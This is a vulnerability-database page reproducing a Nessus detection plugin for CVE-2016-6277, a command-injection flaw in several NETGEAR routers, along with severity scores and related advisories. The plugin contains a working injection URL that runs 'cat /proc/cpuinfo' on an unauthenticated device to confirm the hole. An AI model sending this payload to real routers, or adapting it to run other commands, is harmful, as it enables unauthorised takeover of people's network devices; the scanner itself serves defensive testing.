Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
nessusThis script is Copyright (C) 2016-2023 and is owned by Tenable, Inc. or an Affiliate thereof.NETGEAR_CMD_EXEC.NASL
HistoryDec 14, 2016 - 12:00 a.m.

NETGEAR Multiple Model cgi-bin RCE

2016-12-1400:00:00
This script is Copyright (C) 2016-2023 and is owned by Tenable, Inc. or an Affiliate thereof.
www.tenable.com
68

9.3 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:M/Au:N/C:C/I:C/A:C

8.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

0.975 High

EPSS

Percentile

100.0%

JSON

The remote NETGEAR router is affected by a remote command execution vulnerability due to improper sanitization of user-supplied input passed via /cgi-bin/. An unauthenticated, remote attacker can exploit this, via a specially crafted URL, to execute arbitrary commands on the device.

Note that Nessus has detected this vulnerability by reading the contents of file /proc/cpuinfo.

#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#

include('deprecated_nasl_level.inc');
include('compat.inc');

if (description)
{
  script_id(95823);
  script_version("1.11");
  script_set_attribute(attribute:"plugin_modification_date", value:"2023/04/25");

  script_cve_id("CVE-2016-6277");
  script_xref(name:"CERT", value:"582384");
  script_xref(name:"EDB-ID", value:"40889");
  script_xref(name:"CISA-KNOWN-EXPLOITED", value:"2022/09/07");

  script_name(english:"NETGEAR Multiple Model cgi-bin RCE");

  script_set_attribute(attribute:"synopsis", value:
"The remote router is affected by a remote command execution
vulnerability.");
  script_set_attribute(attribute:"description", value:
"The remote NETGEAR router is affected by a remote command execution
vulnerability due to improper sanitization of user-supplied input
passed via /cgi-bin/. An unauthenticated, remote attacker can exploit
this, via a specially crafted URL, to execute arbitrary commands on
the device.

Note that Nessus has detected this vulnerability by reading the
contents of file /proc/cpuinfo.");
  script_set_attribute(attribute:"see_also", value:"https://kb.netgear.com/000036386/CVE-2016-582384");
  script_set_attribute(attribute:"solution", value:
"Apply the latest available firmware update according to the vendor
advisory.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C");
  script_set_cvss_temporal_vector("CVSS2#E:F/RL:U/RC:ND");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:F/RL:U/RC:X");
  script_set_attribute(attribute:"cvss_score_source", value:"CVE-2016-6277");

  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"exploited_by_nessus", value:"true");
  script_set_attribute(attribute:"metasploit_name", value:'Netgear R7000 and R6400 cgi-bin Command Injection');
  script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2016/12/08");
  script_set_attribute(attribute:"patch_publication_date", value:"2017/02/08");
  script_set_attribute(attribute:"plugin_publication_date", value:"2016/12/14");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:netgear:d6220_firmware");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:netgear:d6400_firmware");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:netgear:r6250_firmware");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:netgear:r6400_firmware");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:netgear:r6700_firmware");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:netgear:r6900_firmware");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:netgear:r7000_firmware");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:netgear:r7100lg_firmware");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:netgear:r7300dst_firmware");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:netgear:r7900_firmware");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:netgear:r8000_firmware");
  script_end_attributes();

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2016-2023 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("netgear_www_detect.nbin");
  script_require_keys("installed_sw/Netgear WWW");
  script_require_ports("Services/www", 80, 443);

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("install_func.inc");
include("misc_func.inc");
include("http.inc");

get_install_count(app_name:"Netgear WWW", exit_if_zero:TRUE);
port = get_http_port(default:80, embedded:TRUE);
install = get_single_install(app_name:"Netgear WWW", port:port);

exploit = "/cgi-bin/;cd$IFS'proc';cat$IFS'cpuinfo'";
res = http_send_recv3(
  method       : "GET",
  item         : exploit,
  port         : port,
  exit_on_fail : TRUE
);

res[2] = tolower(res[2]);

if (
  "bogomips" >< res[2] &&
  "processor" >< res[2]
)
{
  output = chomp(res[2]);

  # just in case, res[2] should have command output only
  if("</html>" >< output)
    output = chomp(substr(output, stridx(output,"</html>")+strlen("</html>")));

  output = ereg_replace(string: output, pattern: "^[ \t\r\n]*", replace: "");

  if (empty_or_null(output)) output = res[2];

  security_report_v4(
    port        : port,
    severity    : SECURITY_HOLE,
    generic     : TRUE,
    cmd         : "cd proc; cat cpuinfo",
    request     : make_list(build_url(qs:exploit, port:port)),
    output      : output
  );
  exit(0);
}
else audit(AUDIT_HOST_NOT, "an affected NETGEAR device");
VendorProductVersionCPE
netgeard6220_firmwarecpe:/o:netgear:d6220_firmware
netgeard6400_firmwarecpe:/o:netgear:d6400_firmware
netgearr6250_firmwarecpe:/o:netgear:r6250_firmware
netgearr6400_firmwarecpe:/o:netgear:r6400_firmware
netgearr6700_firmwarecpe:/o:netgear:r6700_firmware
netgearr6900_firmwarecpe:/o:netgear:r6900_firmware
netgearr7000_firmwarecpe:/o:netgear:r7000_firmware
netgearr7100lg_firmwarecpe:/o:netgear:r7100lg_firmware
netgearr7300dst_firmwarecpe:/o:netgear:r7300dst_firmware
netgearr7900_firmwarecpe:/o:netgear:r7900_firmware
Rows per page:
1-10 of 111

Related

cert 1
packetstorm 2
nvd 2
nuclei 1
cve 2
prion 2
attackerkb 1
openvas 1
metasploit 1
cvelist 2
threatpost 3
exploitdb 2
exploitpack 1
myhack58 1
zdt 2
checkpoint_advisories 1
cisa_kev 1
cisa 1
cert
cert
Multiple Netgear routers are vulnerable to arbitrary command injection
2016-12-09 00:00:00
packetstorm
packetstorm
Netgear R7000 / R6400 cgi-bin Command Injection
2017-03-12 00:00:00
Netgear R6400 Remote Code Execution
2019-12-17 00:00:00
nvd
nvd
CVE-2016-582384
2016-12-14 16:59:00
CVE-2016-6277
2016-12-14 16:59:00
nuclei
nuclei
NETGEAR Routers - Remote Code Execution
2021-09-04 09:45:28
cve
cve
CVE-2016-582384
2016-12-14 16:59:00
CVE-2016-6277
2016-12-14 16:59:00
prion
prion
Design/Logic Flaw
2016-12-14 16:59:00
Design/Logic Flaw
2016-12-14 16:59:00
attackerkb
attackerkb
CVE-2016-6277
2016-12-14 00:00:00
openvas
openvas
NETGEAR Routers RCE Vulnerability (CVE-2016-6277) - Active Check
2016-12-12 00:00:00
metasploit
metasploit
Netgear R7000 and R6400 cgi-bin Command Injection
2017-02-16 03:33:48
cvelist
cvelist
CVE-2016-582384
2016-12-14 16:00:00
CVE-2016-6277
2016-12-14 16:00:00
threatpost
threatpost
Beta Firmware Updates Available for Vulnerable Netgear Routers
2016-12-13 16:25:38
Netgear Routers Remain Exposed to Critical Flaw
2016-12-12 14:30:31
Wicked Botnet Uses Passel of Exploits to Target IoT
2018-05-21 13:01:56
exploitdb
exploitdb
Netgear R7000 / R6400 - &#039;cgi-bin&#039; Command Injection (Metasploit)
2017-03-13 00:00:00
Netgear R6400 - Remote Code Execution
2019-12-17 00:00:00
exploitpack
exploitpack
Netgear R6400 - Remote Code Execution
2019-12-17 00:00:00
myhack58
myhack58
Within the network roaming of how to use JavaScript on the router to execute arbitrary code-a vulnerability warning-the black bar safety net
2017-03-27 00:00:00
zdt
zdt
Netgear R7000 / R6400 cgi-bin Command Injection Exploit
2017-03-12 00:00:00
Netgear R6400 - Remote Code Execution Exploit
2019-12-17 00:00:00
checkpoint_advisories
checkpoint_advisories
Netgear R7000 and R6400 cgi-bin Command Injection (CVE-2016-6277)
2017-05-23 00:00:00
cisa_kev
cisa_kev
NETGEAR Multiple Routers Remote Code Execution Vulnerability
2022-03-07 00:00:00
cisa
cisa
CISA Adds 11 Known Exploited Vulnerabilities to Catalogβ€―
2022-03-07 00:00:00

9.3 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:M/Au:N/C:C/I:C/A:C

8.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

0.975 High

EPSS

Percentile

100.0%

JSON
Related for NETGEAR_CMD_EXEC.NASL
cert1packetstorm2nvd2nuclei1cve2prion2attackerkb1openvas1metasploit1cvelist2threatpost3exploitdb2exploitpack1myhack581zdt2checkpoint_advisories1cisa_kev1cisa1